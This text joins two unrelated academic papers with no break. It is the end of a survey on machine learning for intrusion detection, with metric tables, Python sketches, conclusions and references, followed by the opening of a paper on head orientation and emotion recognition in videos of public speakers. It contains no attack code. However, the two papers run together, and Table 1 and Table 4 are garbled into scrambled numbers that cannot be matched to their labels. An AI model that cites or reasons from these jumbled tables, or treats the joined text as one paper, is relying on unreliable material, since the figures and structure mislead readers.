| Mean Squared Error (MSE): Measures the mean squared error of the predictions. The higher this value, the worse the model is | $MSE = \frac{1}{N} \sum_{i=1}^{N} (y_i - \hat{y}_i)^2$ (8) |
| Mean Absolute Error (MAE): It is the average of the absolute differences between the original values and the predictions. It is more robust against anomalies than MSE because the latter squares the errors | $MAE = \frac{1}{N} \sum_{i=1}^{N} \lvert y_i - \hat{y}_i \rvert$ (9) |
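The difference in robustness between the two regression metrics of Table 12 can be seen with a small numerical sketch. The values are invented: the second set of predictions differs from the first only in one badly wrong prediction.

```python
def mse(y_true, y_pred):
    """Mean squared error: average of squared differences."""
    return sum((t - p) ** 2 for t, p in zip(y_true, y_pred)) / len(y_true)


def mae(y_true, y_pred):
    """Mean absolute error: average of absolute differences."""
    return sum(abs(t - p) for t, p in zip(y_true, y_pred)) / len(y_true)


y_true = [10, 12, 11, 13]
close = [11, 11, 12, 12]         # every prediction is off by 1
with_outlier = [11, 11, 12, 23]  # the last prediction is off by 10

print(mse(y_true, close), mae(y_true, close))
print(mse(y_true, with_outlier), mae(y_true, with_outlier))
```

A single outlier raises MSE from 1 to 25.75 but MAE only from 1 to 3.25, because squaring amplifies large errors.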
Table 13. Performance metrics to evaluate machine learning algorithms for clustering.

| Metrics | Formula |
|---|---|
| Davies-Bouldin Index: The DB index assumes that clusters that are well separated from each other and heavily populated form a good grouping. This index indicates the average “similarity” between groups, where similarity is a measure that compares the distance between groups with the size of the groups. Values closer to zero indicate better grouping | $R_{ij} = \frac{s_i + s_j}{d_{ij}}$, $DB = \frac{1}{k} \sum_{i=1}^{k} \max_{i \neq j} R_{ij}$ |
| Silhouette Coefficient: Indicates how well an element was assigned within its cluster. If it is closer to −1, it would have been better to assign the element to the other group. If s(i) is close to 1, then the point is well assigned and can be interpreted as belonging to an “appropriate” cluster | $s = \frac{b - a}{\max(a, b)}$ |
| Fowlkes-Mallows Index (FMI): It is the geometric mean of precision and recall. The value is between 0 and 1, with the highest value indicating good similarity between the clusters | $FMI = \frac{TP}{\sqrt{(TP + FP)(TP + FN)}}$ |
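The three clustering metrics of Table 13 can be sketched in plain Python as follows. Several choices are assumptions made for illustration: the cluster size s_i is taken as the mean distance of the points to their centroid, d_ij as the distance between centroids, a and b as the mean distance to the point’s own cluster and to the nearest other cluster, and the toy points are invented. For FMI, TP, FP and FN count pairs of points, not individual points.

```python
from math import dist, sqrt


def centroid(points):
    """Coordinate-wise mean of a list of points."""
    return tuple(sum(c) / len(points) for c in zip(*points))


def davies_bouldin(clusters):
    """DB = (1/k) * sum over i of max over j != i of (s_i + s_j) / d_ij."""
    cents = [centroid(c) for c in clusters]
    # s_i: mean distance from the points of cluster i to its centroid.
    spread = [sum(dist(p, cents[i]) for p in c) / len(c) for i, c in enumerate(clusters)]
    k = len(clusters)
    total = 0.0
    for i in range(k):
        total += max(
            (spread[i] + spread[j]) / dist(cents[i], cents[j])
            for j in range(k)
            if j != i
        )
    return total / k


def silhouette(point, own_cluster, other_clusters):
    """s = (b - a) / max(a, b) for a single point."""
    others = [p for p in own_cluster if p != point]
    a = sum(dist(point, p) for p in others) / len(others)
    b = min(sum(dist(point, p) for p in c) / len(c) for c in other_clusters)
    return (b - a) / max(a, b)


def fowlkes_mallows(tp, fp, fn):
    """FMI = TP / sqrt((TP + FP) * (TP + FN)), with pair counts as input."""
    return tp / sqrt((tp + fp) * (tp + fn))


# Two compact, well separated toy clusters.
cluster_a = [(0.0, 0.0), (0.0, 2.0)]
cluster_b = [(10.0, 0.0), (10.0, 2.0)]
print(davies_bouldin([cluster_a, cluster_b]))
print(silhouette((0.0, 0.0), cluster_a, [cluster_b]))
print(fowlkes_mallows(tp=8, fp=2, fn=2))
```

For these well separated clusters the Davies-Bouldin index is close to zero and the silhouette of the sampled point is close to 1, in line with the interpretation given in the table.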
Algorithms: Given that recently introduced deep learning algorithms are generating outstanding results in other investigations [40–42], it is desirable that they be applied in case studies for Intrusion Detection Systems in order to corroborate their performance.
6 Conclusions
Given the large amount of information generated daily and society's dependence on information technologies, the security of computer resources and of information itself is of vital importance. The different techniques and products related to computer security have played a very important role in recent years, with IDS/IPS being one of the essential elements within any cybersecurity scheme. The application of Machine Learning as a support in the identification and prevention of intrusions has provided favorable and promising results. This survey reveals the need for constantly updated data in order to give results that respond to current threats. This is one of the challenges facing academia when proposing alternative techniques for identifying intrusions using ML, and it makes clear that a close link is required between academia and global security organizations to access specialized and updated information and training on the threats, techniques and challenges facing modern society.
References
1. Bettina, J., Baudilio, M., Daniel, M., Alajandro, B., Michiel, S.: Challenges to effective EU cybersecurity policy. European Court of Auditors, pp. 1–74 (2019)
2. Gerling, R.: Cyber Attacks on Free Elections. MaxPlanckResearch, pp. 10–15 (2017)
3. World Economic Forum. The Global Risks Report 2020. Insight Report, pp. 1–114 (2020). 978-1-944835-15-6. http://wef.ch/risks2019
4. Ponemon Institute. 2015 Cost of Data Breach Study: Impact of Business Continuity Management (2018). https://www.ibm.com/downloads/cas/AEJYBPWA
5. Katsumi, N.: Global Threat Intelligence Report Note from our CEO. NTT Security (2019)
6. Chi, C., Freeman, D.: Machine Learning and Security. O'Reilly, Sebastopol (2018)
7. Kaspersky. Project TajMahal a new sophisticated APT framework. Kaspersky (2019). https://securelist.com/project-tajmahal/90240/
8. CyberEdge Group. Cyberthreat Defense Report. CyberEdge Group (2019). https://cyber-edge.com/
9. Hanan, H., et al.: A Taxonomy and Survey of Intrusion Detection System Design Techniques, Network Threats and Datasets. ACM (2018). http://arxiv.org/abs/1806.03517
10. Mazel, J., Casas, P., Fontugne, R., Fukuda, K., Owezarski, P.: Hunting attacks in the dark: clustering and correlation analysis for unsupervised anomaly detection. Int. J. Netw. Manag. 283–305 (2015). https://doi.org/10.1002/nem.1903
11. Khraisat, A., Gondal, I., Vamplew, P., Kamruzzaman, J.: Survey of intrusion detection systems: techniques, datasets and challenges. Cybersecurity 2(1), 1–22 (2019). https://doi.org/10.1186/s42400-019-0038-7
12. Yao, D., Shu, X., Cheng, L., Stolfo, S.: Anomaly Detection as a Service: Challenges, Advances, and Opportunities. Morgan & Claypool Publishers, San Rafael (2018)
13. KDD. KDD-CUP-99 Task Description (1999). https://kdd.ics.uci.edu/databases/kddcup99/task.html
14. Sharafaldin, I., Habibi, A., Ghorbani, A.: Toward generating a new intrusion detection dataset and intrusion traffic characterization. In: ICISSP 2018 - Proceedings of the 4th International Conference on Information Systems Security and Privacy, pp. 108–116 (2018). https://doi.org/10.5220/0006639801080116
15. Ring, M., Wunderlich, S., Scheuring, D., Landes, D., Hotho, A.: A survey of network-based intrusion detection data sets. Comput. Secur. 147–167 (2019). https://arxiv.org/abs/1902.00053. https://doi.org/10.1016/j.cose.2019.06.005
16. Ullah, R., Zhang, X., Kumar, R., Amiri, N., Alazab, M.: An adaptive multi-layer botnet detection technique using machine learning classifiers. Appl. Sci. 9(11), 2375 (2019)
17. Magán-Carrión, R., Urda, D., Díaz-Cano, I., Dorronsoro, B.: Towards a reliable comparison and evaluation of network intrusion detection systems based on machine learning. Appl. Sci. (2020). https://doi.org/10.3390/app10051775
18. Qiu, S., Liu, Q., Zhou, S., Wu, C.: Review of artificial intelligence adversarial attack and defense technologies. Appl. Sci. (2019). https://doi.org/10.3390/app9050909
19. Carlini, N., et al.: On Evaluating Adversarial Robustness (2019). https://arxiv.org/abs/1902.06705
20. Ullaha, F., Babara, M.: Architectural tactics for big data cybersecurity analytics systems: a review. J. Syst. Softw. 151, 81–118 (2019). https://doi.org/10.1016/j.jss.2019.01.051
21. Chadwick, D., et al.: A cloud-edge based data security architecture for sharing and analysing cyber threat information. Future Gener. Comput. Syst. 102, 710–722 (2020). https://doi.org/10.1016/j.future.2019.06.026
22. Menen, A., Gowtham, R.: An efficient ransomware detection system. Int. J. Recent Technol. Eng. 28–31 (2019)
23. Narayanan, S., Ganesan, S., Joshi, K., Oates, T., Joshi, A., Finin, T.: Cognitive Techniques for Early Detection of Cybersecurity Events (2018). http://arxiv.org/abs/1808.00116
24. Ravi, S., Jassi, J., Avdhesh, S., Sharma, R.: Data-mining a mechanism against cyber threats: a review. In: 2016 1st International Conference on Innovation and Challenges in Cyber Security, ICICCS 2016, pp. 45–48 (2016). https://doi.org/10.1109/ICICCS.2016.7542343
25. Daya, A., Salahuddin, M., Limam, N., Boutaba, R.: A graph-based machine learning approach for bot detection. In: 2019 IFIP/IEEE Symposium on Integrated Network and Service Management, IM 2019, pp. 144–152 (2019)
26. Ullah, R., Zhang, X., Kumar, R., Amiri, N., Alazab, M.: An adaptive multi-layer botnet detection technique using machine learning classifiers. Appl. Sci. 9(11), 2375 (2019). https://doi.org/10.3390/app9112375
27. Le, T., Kim, Y., Kim, H.: Network intrusion detection based on novel feature selection model and various recurrent neural networks. Appl. Sci. 9(7), 1392 (2019). https://doi.org/10.3390/app9071392
28. Zhou, Q.: Dimitrios Pezaros School. Evaluation of Machine Learning Classifiers for Zero-Day Intrusion Detection - An Analysis on CIC-AWS-2018 dataset (2019). https://arxiv.org/abs/1905.03685
29. Khraisat, A., Gondal, I., Vamplew, P., Kamruzzaman, J., Alazab, A.: Hybrid intrusion detection system based on the stacking ensemble of C5 decision tree classifier and one class support vector machine. Electronics 9(1), 173 (2020). https://doi.org/10.3390/electronics9010173
30. Liu, W., Ci, L., Liu, L.: A new method of fuzzy support vector machine algorithm for intrusion detection. Appl. Sci. 10(3), 1065 (2020). https://doi.org/10.3390/app10031065
31. Gao, M., Ma, L., Liu, H., Zhang, Z., Ning, Z., Xu, J.: Malicious network traffic detection based on deep neural networks and association analysis. Sensors 20, 1–14 (2020). https://doi.org/10.3390/s20051452
32. Gonzalez-Cuautle, D., et al.: Synthetic minority oversampling technique for optimizing classification tasks in botnet and intrusion-detection-system datasets. Appl. Sci. 10(3), 794 (2020). https://doi.org/10.3390/app10030794
33. Sarnovsky, M., Paralic, J.: Hierarchical intrusion detection using machine learning and knowledge model. Symmetry 12, 1–14 (2020)
34. Wang, M., Lu, Y., Qin, J.: A dynamic MLP-based DDoS attack detection method using feature selection and feedback. Comput. Secur. 88, 1–14 (2020). https://doi.org/10.1016/j.cose.2019.101645
35. Kumar, S., Rahman, M.: Effects of machine learning approach in flow-based anomaly detection on software-defined networking. Symmetry 12(1), 7 (2019)
36. Hwang, R., Peng, M., Nguyen, V., Chang, Y.: An LSTM-based deep learning approach for classifying malicious traffic at the packet level. Appl. Sci. 9(16), 3414 (2019). https://doi.org/10.3390/app9163414
37. Kwon, H., Kim, Y., Yoon, H., Choi, D.: Random untargeted adversarial example on Deep neural network. Symmetry 10(12), 738 (2018). https://doi.org/10.3390/sym10120738
38. Anirban, C., Manaar, A., Vishal, D., Anupam, C., Debdeep, M.: Adversarial attacks and defences: a survey. IEEE Access 35365–35381 (2018). https://doi.org/10.1109/ACCESS.2018.2836950
39. Ibitoye, O., Abou-Khamis, R., Matrawy, A., Shafi, M.: The Threat of Adversarial Attacks on Machine Learning in Network Security - A Survey (2019). https://arxiv.org/abs/1911.02621
40. Niyaz, Q., Sun, W., Javaid, A., Alam, M.: A deep learning approach for network intrusion detection system. In: 9th EAI International Conference on Bio-Inspired Information and Communications Technologies, pp. 1–11, May 2016
41. Guo, W., Mu, D., Xu, J., Su, P., Wang, G., Xing, X.: Lemna: explaining deep learning based security applications. In: Proceedings of the 2018 ACM SIGSAC Conference on Computer and Communications Security, Toronto, ON, Canada, 15 October 2018, pp. 364–379 (2018)
42. Nathan, S., Tran, N., Vu, P., Qi, S.: A deep learning approach to network intrusion detection. IEEE Trans. Emerg. Top. Comput. Intell. 2, 41–50 (2018). https://doi.org/10.1109/TETCI.2017.2772792
43. Abbas, S.A., Almhanna, M.S.: Distributed denial of service attacks detection system by machine learning based on dimensionality reduction. J. Phys. Conf. Ser. 1804(1), 012136 (2021). https://doi.org/10.1088/1742-6596/1804/1/012136
44. Gupta, N., Jindal, V., Bedi, P.: LIO-IDS: handling class imbalance using LSTM and improved one-vs-one technique in intrusion detection system. Comput. Netw. 192, 108076 (2021). https://doi.org/10.1016/j.comnet.2021.108076
45. Liu, X., Li, T., Zhang, R., Wu, D., Liu, Y., Yang, Z.: A GAN and Feature Selection-Based Oversampling Technique for Intrusion Detection (2021)
46. Maseer, Z.K., Yusof, R., Bahaman, N., Mostafa, S.A., Foozy, C.F.M.: Benchmarking of machine learning for anomaly based intrusion detection systems in the CICIDS2017 dataset. IEEE Access 9, 22351–22370 (2021). https://doi.org/10.1109/access.2021.3056614
Head Orientation of Public Speakers: Variation with Emotion, Profession and Age
Yatheendra Pravan Kidambi Murali, Carl Vogel, and Khurshid Ahmad(B)
Trinity College Dublin, The University of Dublin, Dublin, Ireland
{kidambiy,khurshid.ahmad}@tcd.ie, [email protected]
Abstract. The orientation of the head is known to be a conduit of emotion, either intensifying or toning down the emotion expressed by the face. We present a multimodal study of 162 videos comprising speeches of three kinds of professionals: politicians, CEOs and their spokespersons. We investigate the relationship between the three Euler angles (yaw, pitch, roll) that characterise head orientation and emotions, using two well-known facial emotion expression recognition systems. The two systems (Emotient and Affectiva) give similar outputs for the Euler angles. However, the variation of the Euler angles with a given discrete emotion differs between the two systems given the same input. The gender of the person displaying a given emotion plays a key role in distinguishing the output of the two systems; consequently, it appears that the correlation of the Euler angles is system dependent as well. We have introduced a combined measure, which is the sum of the magnitudes of the three Euler angles per frame.
Keywords: Emotion recognition · Head orientation · Multi-modal communication · Gender
1 Introduction
Emotion recognition (ER) is a complex task that is usually performed in noisy conditions. Facial ER systems analyse moving images using a variety of computer vision algorithms and identify landmarks on the face. ER systems rely largely on statistical machine learning algorithms for recognizing emotions and depend crucially on the availability of training databases. These databases are themselves quasi-random samples and may have racial, gender or age bias. Facial landmarks help determine head pose. A head pose is essentially characterized by its yaw, pitch, and roll angles, which respectively describe turning the head left/right, nodding it up/down, and tilting it sideways. In this paper, we present a case study involving the analysis of 162 semi-spontaneous videos given by politicians, chief executive officers (CEOs) of major enterprises, and spokespersons for the politicians. Our data set comprises 12 nationalities, 33 males and 18 females. We have collected 162 videos, 90 from males and 72 from females. We have used the speeches of politicians and CEOs; for spokespersons we have used the answers to questions from journalists. We have used two major ER systems, Emotient [3,10] and Affectiva [6,11], that detect emotions and head orientation from videos. We compare the output of the two systems for six ‘discrete’ emotions and for the three head orientation angles, and examine the correlation between orientation and emotion evidence, also according to categories of race, gender, and age. We begin with a brief literature review (Sect. 2), followed by the methods used (Sect. 3), which form the basis of a pipeline of programs that access video data, pre-process the data frame by frame to ensure that there is only one face in the frame, feed this data into the emotion recognition systems, and then use tests of statistical significance to see the similarities and differences in the emotional state and head pose of a given subject as processed by the two emotion recognition systems. Finally, we present a case study based on the videos of politicians, CEOs, and spokespersons to see how the two recognition systems perform (Sect. 4) and conclude the paper (Sect. 5). Our key contributions are that we have developed a method to understand the difference in the estimation of head orientation by different automatic emotion recognition systems, and that we have estimated the relationship between head orientation and the emotions possibly expressed by politicians, CEOs and spokespersons.
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023. K. Arai (Ed.): FICC 2023, LNNS 652, pp. 79–95, 2023. https://doi.org/10.1007/978-3-031-28073-3_6
2 Motivation and Literature Review
Public engagements of politicians, CEOs, and their spokespersons primarily involve the use of their first language or a second language (which is frequently English). The written text forms the basis on which politicians and others deliver a performance using language and non-verbal cues: facial expressions, voice modulations, and gestures involving the hands, body and head. These cues are used to emphasize a point, attack the opposition, support a friend, or befriend an undecided listener. It has been argued that hand, body, and head gestures may reinforce discrete emotions expressed verbally [8]. However, the gestural information may deliberately be at variance with the text (something like a ‘between-the-lines’ stratagem), or the emotion felt by the speaker may spontaneously leak (emotion leakage is a term coined some 60 years ago) [5]. Head postures (head bowed, head raised, or no head movement) are equally used by speakers to dominate their audience, to show physical strength, or to indicate respect for social hierarchies [12]. In psychological experiments, subjects were shown stick figures based on the facial landmarks of real politicians giving a speech and were asked their opinion about the surrogate politicians' conscientiousness and emotional stability. The subjects appear to agree that pronounced head movement is an indicator of less conscientiousness and a lack of emotional stability [9]. Equally important is the role of body gestures as a whole in emotion expression. Some believe that body gestures merely increase the intensity of emotion expressed through voice or face [4], whilst others believe that body gestures are influenced by the emotions felt. Specific body gestures were observed when actors posed a given emotion: moving the head downwards accompanies the expression of disgust, whilst moving the head backwards is present more during “elated joy” than during any other emotion, and bending the head sideways may accompany anger [13]. The recognition of emotion directly from the movement of major joints in the body, including the head, has shown accuracy of up to 80% [2]. In an analysis [14] of a “3D video database of spontaneous facial expressions in a diverse group of young adults” ([15]: BP4D, comprising 41 subjects expressing 6 different emotions), the authors show that the statistically significant means for yaw and roll were close to zero for all the discrete emotions, highest for anger and fear and lowest for sadness. The range of the three angles was significantly larger for all the emotions: 19.4° for pitch, 12.1° for yaw and 7.68° for roll; the highest values were for anger, joy and fear, followed by surprise and disgust, and the lowest for sadness. Despite the differences in magnitude and sign, our results are within one standard deviation of the mean of Werner et al.'s [14] (see Table 1). Note that the mean for all Euler angles, across the 6 emotions, is small in magnitude for Werner et al., as it is for our calculation.
Table 1. Comparison of mean Euler angles across emotions computed by [14] on their 41 subjects and the results of our computations on our database of 162 videos using Emotient. Note that the results of Affectiva are similar. Results are in degrees.
Pitch Yaw Roll
Joy
Werner et al. 2.8 Our work 2.24
1 0.4 0.13 −0.67
Anger
Werner et al. 2.9 Our work 0.6
2.7 0 0.18 2.47
Fear
Werner et al. 4.1 Our work 1.4
0.3 1.6
Disgust Werner et al. 4.9 Our work 0.05
−0.2 0.7
−0.8 −0.2 2.45 1.15
Interesting work is being carried out on how to make humanoid robots express emotions and on how humans categorize the “facial” and “head” orientation of a robot in terms of discrete emotions felt. In one study, 132 volunteers saw a robot head placed in 9 different directions of pitch and yaw: looking up, at gaze level, and down, combined with looking left, straight ahead, and right [7]. The authors confirm the observation discussed above that the mean value of yaw is zero, find that “anger, fear and sadness are associated with looking down, whereas happiness, surprise and disgust are associated with looking upward”, and report that pitch varies with emotions. These studies are important in that they do not rely on the analysis of facial emotion expression, as the “humanoid” robot has no facial muscles. Our literature review suggests the following questions:
1. Is the computation of head orientation independent of the facial emotion recognition systems used?
This question is important as the output of emotion evidence does vary from system to system [1].
2. What is the relationship between head orientation/movement and emotions?
(a) If there is a relationship, based largely on posed/semi-posed videos, does this relationship also exist in spontaneous videos?
(b) Is the relationship between head orientation and emotions independent of the gender and age of the video protagonist?
We discuss the methods and systems used to investigate these questions.
3 Method and System Design
Facial emotion recognition systems compute the probability of the evidence of discrete emotions on a frame-by-frame basis; the systems usually also produce the three Euler angles (yaw, pitch, roll). Our videos are of politicians and CEOs giving speeches and of their spokespersons giving press conferences. The videos were edited to have only the politician, CEO or spokesperson in each frame, and were then trimmed to maximize the image of the speaker in the frame. We then processed the edited videos through both Emotient and Affectiva. The emotion evidence is produced by the two systems, and descriptive statistics of all our videos are computed together with the correlation between the outputs of the two systems and how the outputs differ from each other. We compute the variation of the Euler angles with each of the six discrete emotions we study (anger, joy, sadness, surprise, disgust, and fear). The Euler angles are given the same statistical treatment. Typically, authors in the literature talk about small angles and large angles; this is a subjective judgment, and we have a fuzzy logic description which uses the notion of fuzzy boundaries between the value sets of large, medium and small angles. A number of programs were used in the computation of head orientation (and emotions) and in carrying out the statistical analysis. The pipelines of such programs are shown in Fig. 1.
Fig. 1. Variation of anger in both the systems
In analyzing head position and movement, we consider the yaw, pitch and roll measurements by both systems for each frame. In some of our analyses we consider these measurements directly. In others we look at derived measurements: change in yaw, pitch and roll from one frame to the next, aggregations of yaw, pitch and roll, and change in aggregations from one frame to the next. There are two sorts of aggregations. The first (see (1)) records the head pose angle sum (PAS) for each frame (i) as the sum of the magnitudes of the three angular measurements; absolute values are used so that wide angles in one direction are not cancelled by wide angles with the opposite sign on a distinct rotation axis.

$$\mathrm{PAS}_i = |\mathrm{yaw}_i| + |\mathrm{pitch}_i| + |\mathrm{roll}_i| \qquad (1)$$

A related value records the angular velocity of each of yaw, pitch and roll for each system, effectively the change in yaw, pitch and roll from one frame to the next. Thus, we also consider the sum of the magnitudes of those values.

$$\mathrm{PAS.df}_i = |\mathrm{yaw.velocity}_i| + |\mathrm{pitch.velocity}_i| + |\mathrm{roll.velocity}_i| \qquad (2)$$
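The two sums in (1) and (2) can be sketched in plain Python. This is only an illustration under stated assumptions: each frame is represented as a (yaw, pitch, roll) tuple in degrees, the "velocity" of an angle is taken to be its plain difference between consecutive frames (no division by the frame interval), and the function names and sample frames are hypothetical.

```python
def pose_angle_sum(yaw, pitch, roll):
    """Eq. (1): sum of the magnitudes of the three angles for one frame."""
    return abs(yaw) + abs(pitch) + abs(roll)


def pas_per_frame(frames):
    """PAS for every frame in a sequence of (yaw, pitch, roll) tuples."""
    return [pose_angle_sum(*frame) for frame in frames]


def pas_velocity_per_frame(frames):
    """Eq. (2): summed magnitude of frame-to-frame change, from the second frame on."""
    changes = []
    for previous, current in zip(frames, frames[1:]):
        changes.append(sum(abs(c - p) for c, p in zip(current, previous)))
    return changes


# Illustrative frames only (degrees).
frames = [(10.0, -5.0, 2.0), (12.0, -4.0, 2.0), (-3.0, 0.0, 1.0)]
print(pas_per_frame(frames))
print(pas_velocity_per_frame(frames))
```

Note that the first frame has no predecessor, so the velocity series is one element shorter than the PAS series.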
The second aggregation treats the values of yaw, pitch and roll at each frame (i) as a vector, YPR (3), where each component is normalized with respect to the minimum and maximum angle among all of the raw values for yaw, pitch and roll.

$$\mathrm{YPR}_i = \langle \mathrm{yaw}_i, \mathrm{pitch}_i, \mathrm{roll}_i \rangle \qquad (3)$$

The measurement addressed is the change in that vector, computed as 1 minus the cosine similarity between YPR at one frame (i) and at its preceding frame (i − 1); see (4).

$$\mathrm{YPR.df}_i = 1 - \cos(\mathrm{YPR}_i, \mathrm{YPR}_{i-1}) \qquad (4)$$
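A minimal sketch of the change measure in (4) follows. It assumes that the normalization is a single min-max rescaling over all raw angle values pooled together, and that cosine similarity is the usual inner product of two vectors divided by the product of their lengths. The function names and sample frames are hypothetical.

```python
import math


def normalise(frames):
    """Min-max rescale every component using the pooled minimum and maximum."""
    values = [v for frame in frames for v in frame]
    lo, hi = min(values), max(values)
    return [tuple((v - lo) / (hi - lo) for v in frame) for frame in frames]


def cosine_similarity(x, y):
    """Inner product divided by the product of the vector lengths."""
    dot = sum(a * b for a, b in zip(x, y))
    denom = math.sqrt(sum(a * a for a in x) * sum(b * b for b in y))
    if denom == 0.0:
        return float("nan")  # undefined when either vector is all zeros
    return dot / denom


def ypr_change(frames):
    """Eq. (4): 1 minus the cosine similarity of consecutive normalised frames."""
    scaled = normalise(frames)
    return [1.0 - cosine_similarity(scaled[i], scaled[i - 1])
            for i in range(1, len(scaled))]


# Illustrative frames only: no change, then a switch from yaw to pitch.
frames = [(10.0, 0.0, 0.0), (10.0, 0.0, 0.0), (0.0, 10.0, 0.0)]
print(ypr_change(frames))
```

An unchanged pose yields a value of 0, while a pose that moves to an orthogonal direction in the normalised space yields 1. Unlike the angle sums, this measure responds to the direction of the pose vector rather than to its overall magnitude.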
Cosine similarity, in turn, is defined through the cross product of the normalized vectors, as in (5).¹

$$\cos(x, y) = \frac{\mathrm{crossprod}(x, y)}{\sqrt{\mathrm{crossprod}(x) \cdot \mathrm{crossprod}(y)}} \qquad (5)$$

¹ In (5), it is understood that the arity-one crossproduct is identical to the arity-two crossproduct of a vector with itself.

4 Data and Results

We describe the data set we have used, followed by the results organised according to the three questions outlined in the literature review section above.

4.1 The Data Used

The data used are described in Table 2 and Table 3. The two systems will generally produce emotion evidence for frames on the same timestamp. Sometimes, one or both of the systems does not generate any emotion evidence for a frame and returns blank values. We have only considered the values where both systems provided evidence for the same timestamp.
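The restriction to timestamps for which both systems returned evidence can be sketched as follows. This is an assumption-laden illustration: each system's output is represented as a dictionary from timestamp to a value, blank values are represented as None, and the function name and sample data are hypothetical rather than the export format of either system.

```python
def common_frames(system_a, system_b):
    """Keep only timestamps where both systems returned a non-blank value."""
    shared = sorted(
        t for t in system_a
        if t in system_b and system_a[t] is not None and system_b[t] is not None
    )
    return [(t, system_a[t], system_b[t]) for t in shared]


# Illustrative outputs only: timestamp in seconds -> emotion evidence.
affectiva = {0.00: 0.10, 0.04: None, 0.08: 0.30, 0.12: 0.25}
emotient = {0.00: 0.20, 0.04: 0.15, 0.08: 0.35}

for row in common_frames(affectiva, emotient):
    print(row)
```

Here the frame at 0.04 s is dropped because one system returned a blank, and the frame at 0.12 s is dropped because the other system has no entry for it, leaving two common frames.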
Table 2. Data demographic profile: by nationality and gender, the count of individuals, videos and frames within videos recognized by Affectiva and Emotient.
Nationality       Individuals   Videos     Affectiva frames     Emotient frames      Common frames
                  F     M       F    M     Female    Male       Female    Male       Female    Male
China             3     6       14   16    46548     100659     47263     102581     46413     100205
France            1     0       2    0     7995      0          7364      0          7354      0
Germany           1     1       5    5     19249     21353      19267     21529      19217     21228
India             1     7       2    18    8707      91061      8757      103965     8094      77169
Ireland           0     1       0    2     0         19283      0         19228      0         19200
Italy             0     1       0    2     0         8356       0         8370       0         8313
Japan             0     1       0    1     0         20229      0         20213      0         20206
New Zealand       1     0       5    0     25128     0          25750     0          25002     0
Pakistan          0     2       0    6     0         72585      0         59553      0         71887
South Korea       0     2       0    4     0         35184      0         35237      0         35172
United Kingdom    1     1       5    5     46182     47068      43044     52387      20931     46470
United States     10    11      39   31    239610    187580     248407    186610     238090    182361
Total             18    33      72   90    393419    603358     399852    620616     365101    593139
Table 3. Age ranges and counts of individuals in each occupation, by nationality.
Nationality       Age range   CEO   Politician   Spokesperson
China             49–73       0     6            3
France            49–49       1     0            0
Germany           62–67       0     1            1
India             28–72       3     5            0
Ireland           51–65       0     0            1
Italy             46–46       1     0            0
Japan             73–73       0     1            0
New Zealand       41–41       0     1            0
Pakistan          46–69       0     1            1
South Korea       69–71       0     2            0
United Kingdom    51–57       0     1            1
United States     64–91       5     13           3
Total             28–91       10    31           10

4.2 Preliminary Data Profiling
First we consider agreement between Affectiva and Emotient on the basic underlying quantities of yaw, pitch and roll measurements (see plots of each of these in Fig. 2). The Pearson correlation coefficient for yaw is 0.8567581 (p < 2.2e−16); for pitch, 0.6941681 (p < 2.2e−16); for roll, 0.8164813 (p < 2.2e−16).² This seems to us to provide sufficient evidence to expect that there may be significant agreement between the systems in other measured quantities.
² Our inspection of histograms for each of the angle measurements suggested that a Pearson correlation would be reasonable. In many other cases, we use non-parametric tests and correlation coefficients.
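The Pearson coefficient used for this comparison can be sketched in plain Python. The function name and the paired sample values are hypothetical; the sketch computes only the coefficient, not the associated p-value.

```python
import math


def pearson_r(x, y):
    """Pearson correlation: covariance divided by the product of the spreads."""
    n = len(x)
    mean_x, mean_y = sum(x) / n, sum(y) / n
    sxy = sum((a - mean_x) * (b - mean_y) for a, b in zip(x, y))
    sxx = sum((a - mean_x) ** 2 for a in x)
    syy = sum((b - mean_y) ** 2 for b in y)
    return sxy / math.sqrt(sxx * syy)


# Illustrative per-frame yaw values only (degrees), one list per system.
yaw_system_a = [-10.0, -2.0, 0.0, 5.0, 12.0]
yaw_system_b = [-6.0, -1.5, 1.0, 3.0, 8.5]
print(pearson_r(yaw_system_a, yaw_system_b))
```

The coefficient is insensitive to a constant offset or rescaling of either series, so two systems can correlate strongly while still reporting systematically different angle values.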
Fig. 2. Comparison of the output of Euler angles computed by Affectiva versus the angles computed by Emotient
The scatter plots (Fig. 2) appear to have points distributed around a straight line, and we have linearly regressed the angles generated by Emotient (per frame, for all our videos) as a function of the angles generated by Affectiva:

$$\mathrm{Yaw}_{\mathrm{Emotient}} = 0.58 \cdot \mathrm{Yaw}_{\mathrm{Affectiva}} + 0.72$$
$$\mathrm{Pitch}_{\mathrm{Emotient}} = 0.44 \cdot \mathrm{Pitch}_{\mathrm{Affectiva}} - 1.36$$
$$\mathrm{Roll}_{\mathrm{Emotient}} = 0.54 \cdot \mathrm{Roll}_{\mathrm{Affectiva}} + 0.76$$

This is the basis of our observation that the angles generated by the two systems are in a degree of agreement. We are investigating these relationships further. On the other hand, the systems show little agreement with respect to the assessments made of the most probable emotion for each frame (Cohen's κ = 0.123, p = 0). Table 4 presents the confusion matrix of system classifications. Therefore, and because the data is collected “in the wild” rather than with ‘gold standard’ labels for each (or any) frame, we analyze the interacting effects with respect to each system's own judgment of the most likely emotion.
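Cohen's κ, the agreement statistic quoted above, can be computed directly from a confusion matrix of the kind presented in Table 4. The sketch below is illustrative only: the function name is hypothetical and the small two-category matrix is invented for the example, not taken from the paper's data.

```python
def cohens_kappa(matrix):
    """Cohen's kappa from a square confusion matrix (rows: rater A, columns: rater B)."""
    total = sum(sum(row) for row in matrix)
    k = len(matrix)
    # Observed agreement: share of items on the diagonal.
    observed = sum(matrix[i][i] for i in range(k)) / total
    # Agreement expected by chance from the row and column marginals.
    row_totals = [sum(row) for row in matrix]
    col_totals = [sum(matrix[i][j] for i in range(k)) for j in range(k)]
    expected = sum(row_totals[i] * col_totals[i] for i in range(k)) / (total * total)
    return (observed - expected) / (1.0 - expected)


# Illustrative 2x2 matrix only: 35 of 50 items fall on the diagonal.
example = [[20, 5],
           [10, 15]]
print(cohens_kappa(example))
```

κ discounts the agreement that two raters would reach by chance given how often each uses every label, which is why a large diagonal count does not by itself imply a high κ when a few labels dominate both systems' outputs.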
Table 4. Cross classification of the most probable emotion for each frame according to Affectiva and Emotient. The counts along the diagonal, in bold, indicate agreements.
Affectiva Emotient Anger Contempt Disgust Fear Anger Contempt Disgust
39423
23110
2215
4228
29030
51650 19178
Joy
Sadness Surprise
25222
24863
1025
6074
1780
831
55633 125605 36448
56108
24737
22483
4247
1945
697
2887
1636 30555
798
790
2397
Fear
333
1256
1366
Joy
193
2126
3409
Sadness
9355
1654
17994
Surprise
7824
38090
14831
4024
1529
7759
1119
48438 56010
73547
26236
45552
4.3 Results and Discussion
